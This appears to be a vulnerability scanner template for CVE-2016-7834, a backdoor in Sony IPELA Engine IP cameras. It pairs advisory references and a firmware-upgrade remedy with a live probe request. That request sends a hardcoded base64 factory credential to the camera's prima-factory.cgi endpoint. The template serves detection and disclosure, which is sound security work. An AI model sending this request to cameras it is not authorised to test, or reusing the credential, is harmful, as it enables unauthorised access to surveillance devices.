id: sony-camera-backdoor info: name: Backdoor In Sony IPELA Engine IP Cameras author: af001 severity: high description: | Multiple SONY network cameras vulnerable to sensitive information disclosure via hardcoded credentials and a backdoor. reference: - https://sec-consult.com/vulnerability-lab/advisory/backdoor-vulnerability-in-sony-ipela-engine-ip-cameras/ - https://www.bleepingcomputer.com/news/security/backdoor-found-in-80-sony-surveillance-camera-models/ - https://jvn.jp/en/vu/JVNVU96435227/index.html - https://www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras remediation: | Upgrade to the latest version of the firmware provided by Sony. classification: cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2016-7834 cwe-id: CWE-200 tags: sony,backdoor,unauth,telnet,iot,camera requests: - method: GET path: - "{{BaseURL}}/command/prima-factory.cgi" headers: Authorization: Bearer cHJpbWFuYTpwcmltYW5h matchers-condition: and matchers: - type: word part: header words: - 'gen5th' - 'gen6th' condition: or - type: status status: - 204